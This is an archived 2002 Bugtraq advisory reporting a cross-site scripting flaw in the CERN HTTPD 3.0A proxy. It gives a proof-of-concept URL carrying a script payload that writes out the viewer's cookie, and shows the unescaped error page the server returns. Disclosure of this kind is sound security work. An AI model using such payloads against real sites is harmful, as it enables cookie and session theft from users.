Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

CERN Proxy Server: Cross-Site Scripting Vulnerability

From: "TAKAGI, Hiromitsu" <takagi.hiromitsu () aist go jp>
Date: Mon, 12 Aug 2002 08:41:40 +0900
CERN Proxy Server: Cross-Site Scripting Vulnerability
=====================================================

Affected:
  CERN HTTPD 3.0A
  http://www.w3.org/Daemon/Activity.html
  
Vendor Status:
  CERN httpd team (httpd () w3 org) was notified on Aug 10, 2001 but
  they did not respond.

Exploit:
  http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>

  ========================================================
  <HTML>
  <HEAD>
  <TITLE>Error Message</TITLE>
  </HEAD>
  <BODY>
  <H1>Fatal Error 500</H1>
  Can't Access Document:  http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.
  <P>
  <B>Reason:</B> Can't locate remote host:  nonexistenthost.google.com.
  <P>
...snip...
  ========================================================

  Similar problems have been found in Proxomitron Naoko-4 BetaFour,
  Microsoft ISA Server and Squid 2.4 DEVEL4.
  <http://www.securityfocus.com/bid/3087>
  <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
  <http://www.securityfocus.com/archive/1/197606>


Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/
Previous By Date Next
Previous By Thread Next

Current thread: